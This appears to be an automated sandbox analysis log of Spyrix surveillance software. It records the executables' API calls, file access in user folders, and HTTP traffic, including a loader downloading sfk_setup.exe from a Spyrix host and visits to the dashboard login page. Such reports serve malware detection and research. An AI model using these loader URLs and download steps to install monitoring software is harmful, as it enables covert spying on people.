            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_00259D10 memcpy,memmove,memset,CertFreeCertificateContext,WSAGetLastError,strtol,strchr,strlen,strncpy,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strchr,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertFreeCertificateContext,CertFreeCertificateContext,strchr,strlen,CertOpenStore,CryptStringToBinaryA,CertFindCertificateInStore,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,GetLastError,CertFreeCertificateContext,65_2_00259D10
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: -----BEGIN PUBLIC KEY-----65_2_00258FA0
            Source: qrl.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
            Source: https://dashboard.spyrix.com/loginHTTP Parser: Number of links: 0
            Source: https://dashboard.spyrix.com/loginHTTP Parser: <input type="password" .../> found but no <form action="...
            Source: https://dashboard.spyrix.com/loginHTTP Parser: Title: Welcome Back does not match URL
            Source: https://dashboard.spyrix.com/loginHTTP Parser: <input type="password" .../> found
            Source: https://dashboard.spyrix.com/loginHTTP Parser: No <meta name="author".. found
            Source: https://dashboard.spyrix.com/loginHTTP Parser: No <meta name="copyright".. found
            Source: unknownHTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.7:49702 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 167.114.14.170:443 -> 192.168.2.7:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 167.114.14.168:443 -> 192.168.2.7:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.7:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.7:55007 version: TLS 1.2
            Source: 404.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_0040AC68 FindFirstFileW,FindClose,51_2_0040AC68
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_0040A700 lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,51_2_0040A700
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033A75E8 FindFirstFileA,51_2_033A75E8
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033A76C4 FindFirstFileA,GetLastError,51_2_033A76C4
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeFile opened: C:\Users\user
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeFile opened: C:\Users\user\AppData\Roaming
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeFile opened: C:\Users\user\AppData
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then mov eax, edx65_2_0024B510
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then cmp dword ptr [edi+04h], ebp65_2_002448F0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then movzx edx, byte ptr [ecx]65_2_002A5060
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push esi65_2_002420F0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then add eax, dword ptr [ecx+10h]65_2_002AC0F0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then mov ecx, eax65_2_0029F270
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then mov edi, dword ptr [ebx]65_2_00247360
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then mov byte ptr [edx], cl65_2_00285360
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push 00000000h65_2_00246370
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push dword ptr [ebx]65_2_002533B0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push 00000000h65_2_002474E0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push 00000000h65_2_00247641
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push 0000000Ch65_2_002536A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push 00000019h65_2_002536A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push 00000000h65_2_002476C1
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push 00000000h65_2_00247771
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push 00000000h65_2_0024774F
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push 00000000h65_2_002477DB
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push 00000000h65_2_00247828
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push 00000000h65_2_0024785D
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then mov ebx, dword ptr [edi-04h]65_2_0029E8A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push 00000000h65_2_002478AB
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push 00000000h65_2_00247924
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push 00000000h65_2_00247959
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push 00000000h65_2_002479B7
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]65_2_002659E0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then mov eax, dword ptr [edi]65_2_00235A00
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push 00000000h65_2_00247A5E
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push 00000000h65_2_00247A9B
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then test ebp, ebp65_2_00258AE0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then mov ebx, ebp65_2_0025DAD0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]65_2_0025DAD0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push 00000000h65_2_00247BAC
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push 00000000h65_2_00247B8D
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then test ebp, ebp65_2_00258BD0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then cmp esi, edi65_2_00286C00
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then mov ebx, dword ptr [esi]65_2_00273C90
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then mov edx, dword ptr [esp+74h]65_2_0025BD50
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push 00000000h65_2_00247D8F
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then mov ebp, dword ptr [ebx+58h]65_2_0029ADE0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 4x nop then push dword ptr [edi]65_2_00288EF0

            Networking

            barindex
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e
            Source: global trafficTCP traffic: 192.168.2.7:55006 -> 1.1.1.1:53
            Source: global trafficHTTP traffic detected: GET /lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s148 HTTP/1.1Host: filedn.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_002673D0 recv,send,WSAGetLastError,65_2_002673D0
            Source: global trafficHTTP traffic detected: GET /lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s148 HTTP/1.1Host: filedn.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
            Source: global trafficHTTP traffic detected: GET /loader/link.php?prg_id=sfk HTTP/1.1Host: cdnbaynet.comUser-Agent: sfk-dst-loader-2.0Accept: */*
            Source: global trafficHTTP traffic detected: GET /download/sfk/sfk_setup.exe HTTP/1.1Host: swtb-download.spyrix-sfk.comUser-Agent: sfk-dst-loader-2.0Accept: */*
            Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=LgzHuDYMDELwvCA&MD=nDsdSsxd HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=LgzHuDYMDELwvCA&MD=nDsdSsxd HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: dashboard.spyrix.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/index-93c74fef.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/index-004f4025.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn.js HTTP/1.1Host: dashboard.spyrix.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/index-004f4025.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dashboard.spyrix.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn.js HTTP/1.1Host: dashboard.spyrix.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/en-08b2a987.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dashboard.spyrix.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/ConfirmPhoneModal-86d79a8a.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/Button-ca236c00.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/ButtonTemplate-fd9601a7.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/Nunito-Regular-73dcaa51.woff2 HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/ButtonText-ead06ca1.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/Modal-04ffda94.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/Input-34212571.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/en-5393c481.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/en-08b2a987.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/index-1178777c.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
